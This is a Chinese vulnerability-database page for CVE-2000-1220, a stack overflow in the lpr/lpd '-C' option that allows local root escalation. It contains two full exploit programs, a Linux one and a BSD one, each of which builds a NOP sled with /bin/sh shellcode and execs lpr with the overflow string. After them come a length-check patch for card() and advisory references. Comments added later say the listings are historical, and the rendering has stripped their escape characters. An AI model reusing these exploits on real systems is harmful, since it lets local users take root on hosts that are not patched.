Linux lpr line printer daemon特权提升漏洞。

Linux lpr line printer daemon特权提升漏洞。

漏洞ID 1105261 漏洞类型 未知
发布时间 1996-10-25 更新时间 2005-10-20
CVE编号 CVE-2000-1220
CNNVD-ID CNNVD-200001-025
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-025
|漏洞详情
多个Linux操作系统的lpr包中的line printer daemon (lpd)存在漏洞。本地用户通过发送邮件执行任意命令行参数提升根特权，已证明的方式之一是使用-C选项指定配置文件。
|漏洞EXP
-------------------------------------- linux_lpr_exploit.c ----------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

/*
 * Historical proof-of-concept helper from the 1996 lpr advisory
 * (CVE-2000-1220); kept byte-identical as a reference artifact.
 *
 * The inline asm copies %esp into %eax and the function then falls off
 * the end without a return statement: the caller only sees a stack
 * pointer if the compiler happens to treat %eax as the return register.
 * That is undefined behavior in standard C and is presumably tied to
 * 32-bit x86 and a particular compiler of the era.
 *
 * As rendered on this page the backslash escapes have been stripped
 * (note the stray trailing "n" in the asm string), so the listing does
 * not compile as-is.
 */
long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

/*
 * Historical Linux proof-of-concept for CVE-2000-1220 (lpr/lpd,
 * 1996-10-25), preserved here for reference only.  The defensive fix is
 * the length check added to lpr.c's card() routine, shown further down
 * this page; vendor updates are listed in the references.
 *
 * What the code visibly does: it builds an argument of roughly
 * BUFFER_SIZE bytes in a heap buffer and passes it to /usr/bin/lpr as the
 * value of the -C option.  Unpatched lpr copied that argument into a
 * fixed BUFSIZ stack buffer in card() without checking its length, which
 * is the defect the advisory describes.
 *
 * Notes for the reader:
 *  - As rendered on this page the backslash escapes inside execshell and
 *    the printf format string have been stripped, so this will not
 *    compile as-is.
 *  - `void main()` is non-standard, and `exit(0)` on the allocation
 *    failure path reports success; both are left untouched as part of
 *    the historical listing.
 *  - u_char is not a standard C type; it presumably comes from one of the
 *    (garbled) system headers above -- not verifiable from this page.
 */
void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07"
                        "x89x56x0fxb8x1bx56x34x12x35x10x56x34x12"
                        "x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80xe8"
                        "xd7xffxffxff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);   /* reports success even though allocation failed */
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;   /* NUL-terminate so lpr sees it as one argv string */
   /* The oversized -C argument is what unpatched card() copied into
    * its BUFSIZ stack buffer; the patched version rejects it. */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
------------------------------------------- bsd_lpr_exploit.c ------
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

/*
 * BSD variant of the same historical helper (CVE-2000-1220 advisory);
 * kept byte-identical as a reference artifact.
 *
 * Copies %esp into %eax via inline asm and then falls off the end with no
 * return statement -- undefined behavior in standard C that only yields
 * the stack pointer if the compiler treats %eax as the return register
 * (presumably 32-bit x86 with a compiler of the era).
 *
 * The backslash escapes have been stripped in this rendering (stray
 * trailing "n"), so the listing does not compile as-is.
 */
long get_esp(void)
{
   __asm__("movl %esp,%eaxn");
}

/*
 * Historical BSD proof-of-concept for CVE-2000-1220 (lpr/lpd,
 * 1996-10-25), preserved here for reference only.  It is structurally
 * identical to the Linux listing above and differs only in the payload
 * bytes.  The defensive fix is the length check added to lpr.c's card()
 * routine, shown further down this page.
 *
 * What the code visibly does: it builds an argument of roughly
 * BUFFER_SIZE bytes in a heap buffer and passes it to /usr/bin/lpr as the
 * value of the -C option; unpatched lpr copied that argument into a fixed
 * BUFSIZ stack buffer in card() with no length check.
 *
 * Notes for the reader:
 *  - The backslash escapes inside execshell and the printf format string
 *    have been stripped in this rendering, so this will not compile
 *    as-is.
 *  - `void main()` is non-standard, and `exit(0)` on the allocation
 *    failure path reports success; both are left untouched as part of
 *    the historical listing.
 */
void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f"
   "x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52"
   "x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01"
   "x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);   /* reports success even though allocation failed */
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;   /* NUL-terminate so lpr sees it as one argv string */
   /* The oversized -C argument is what unpatched card() copied into
    * its BUFSIZ stack buffer; the patched version rejects it. */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------

  Here is a little patch -- see file lpr.c, function card():
("!!" marks added lines)

--------------------------------------------------------------------------
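/*
 * Append one control-file "card" to the temporary control file: the
 * one-character card code @c, then the text @p2 with any embedded
 * newline flattened to a space, then a terminating newline.
 *
 * @param c   single-character card code written first
 * @param p2  NUL-terminated card text; must not be NULL
 *
 * Security: buf is a fixed BUFSIZ stack buffer and the text is caller
 * controlled (for example the argument of `lpr -C`), so its length is
 * checked *before* anything is copied.  A card occupies
 * strlen(p2) + 2 bytes (code + text + '\n'), so any text longer than
 * BUFSIZ - 2 cannot fit and is rejected.  This is the fix for the
 * unchecked copy described by CVE-2000-1220; the "!!" lines in the
 * original advisory correspond to the length check below.
 *
 * Writes to the file-scope descriptor tfd, defined elsewhere in lpr.c.
 * As in the original, the write() result is not checked.
 *
 * The page's rendering had stripped the backslash escapes ('n', '',
 * "...n"); they are restored here so the function compiles.
 */
static void card(int c, char *p2)
{
        char buf[BUFSIZ];
        char *p1 = buf;
        size_t len = 2;                 /* card code + trailing newline */

        /* Reject text that cannot fit in buf together with c and '\n'. */
        if (strlen(p2) > BUFSIZ - 2) {
                printf("No, thanks...\n");
                exit(1);
        }

        *p1++ = c;
        while ((c = *p2++) != '\0') {
                /* A raw newline would terminate the card early. */
                *p1++ = (c == '\n') ? ' ' : c;
                len++;
        }
        *p1++ = '\n';
        write(tfd, buf, len);
}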


// milw0rm.com [1996-10-25]
|参考资料

来源:US-CERT Vulnerability Note: VU#39001
名称:VU#39001
链接:http://www.kb.cert.org/vuls/id/39001
来源:XF
名称:redhat-lpd-print-control(3841)
链接:http://xforce.iss.net/xforce/xfdb/3841
来源:BID
名称:927
链接:http://www.securityfocus.com/bid/927
来源:REDHAT
名称:RHSA-2000:002
链接:http://www.redhat.com/support/errata/RHSA-2000-002.html
来源:DEBIAN
名称:20000109 lpr – access control problem and root exploit
链接:http://www.debian.org/security/2000/20000109
来源:www.atstake.com
链接:http://www.atstake.com/research/advisories/2000/lpd_advisory.txt
来源:BUGTRAQ
名称:20000108 L0pht Advisory: LPD, RH 4.x, 5.x, 6.x
链接:http://seclists.org/lists/bugtraq/2000/Jan/0116.html
来源:SGI
名称:20021104-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20021104-01-P

